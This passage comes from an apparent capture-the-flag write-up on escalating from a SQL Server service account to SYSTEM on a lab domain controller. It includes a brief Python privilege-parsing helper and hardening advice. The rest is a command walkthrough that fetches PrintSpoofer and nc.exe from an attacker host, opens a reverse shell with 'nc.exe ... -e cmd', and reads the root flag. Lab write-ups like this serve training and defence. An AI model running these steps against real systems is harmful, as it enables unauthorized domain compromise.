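            privs[parts[0]] = parts[-1]
    return privs


def high_risk_privileges(text):
    """Sorted (privilege, state) pairs from HIGH_RISK. A Disabled privilege is still held by the
    token and can be enabled by the process itself, so it is reported too."""
    return sorted((name, state) for name, state in parse_whoami_priv(text).items()
                  if name in HIGH_RISK)


if __name__ == "__main__":
    for name, state in high_risk_privileges(SAMPLE):
        print(f"{name:32} {state}")
```

From a hardening point of view the combination seen on this box is the real finding: a SQL Server service account that holds SeImpersonatePrivilege, xp_cmdshell left enabled, and all of it hosted on a domain controller. Keeping xp_cmdshell disabled and not co-hosting SQL Server with the DC role removes the path regardless of which Potato-style tool is current.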

An alternative exploitation path is to abuse the Print Spooler service, provided that it is actively running on the target system.

PS C:\Windows\system32> Get-Service -Name Spooler

Status   Name               DisplayName                           
------   ----               -----------                           
Running  Spooler            Print Spooler                         

The output confirms that the Print Spooler service is actively running on the target system, making it a viable privilege escalation vector.

At this stage, two tools need to be transferred to the target system in order to proceed with the exploitation:

  • PrintSpoofer: the exploit binary used to abuse SeImpersonatePrivilege.
  • Ncat: used to establish a reverse shell as NT AUTHORITY\SYSTEM.

Both tools are served from our machine over HTTP and fetched with curl from the target:

PS C:\Temp> curl http://VpnIP:8000/PrintSpoofer.exe -O PrintSpoofer.exe
PS C:\Temp> curl http://VpnIP:8000/nc.exe -O nc.exe
PS C:\Temp> dir


    Directory: C:\Temp


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         6/20/2026  11:53 AM          38616 nc.exe                                                               
-a----         6/20/2026  11:53 AM          27136 PrintSpoofer.exe                                                     
-a----          9/3/2025   2:01 PM        6379936 SQLEXPRESS.exe                                                       

First, we set up an additional listener to receive the incoming connection.

> nc -nlvp 4444
Listening on 0.0.0.0 4444

We then execute the exploit against the target service.

PS C:\Temp> .\PrintSpoofer.exe -c "nc.exe YourVpnIP 4444 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

Finally, we obtain a shell running as the Domain Controller's machine account, hack\dc01$, which holds highly elevated privileges within the Active Directory environment.

C:\Windows\system32>whoami
whoami
hack\dc01$

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

Root Flag

To complete the challenge, we retrieve the root flag from the Administrator's Desktop:

C:\Windows\system32>dir c:\Users\Administrator\Desktop
dir c:\Users\Administrator\Desktop
 Volume in drive C has no label.
 Volume Serial Number is 70F9-CC7D

 Directory of c:\Users\Administrator\Desktop

09/06/2025  08:52 PM    <DIR>          .
09/03/2025  07:47 PM    <DIR>          ..
09/02/2025  06:46 PM             2,308 Microsoft Edge.lnk
09/03/2025  02:10 PM               126 root.txt
               2 File(s)          2,434 bytes
               2 Dir(s)  111,489,622,016 bytes free

This post is licensed under CC BY 4.0 by the author.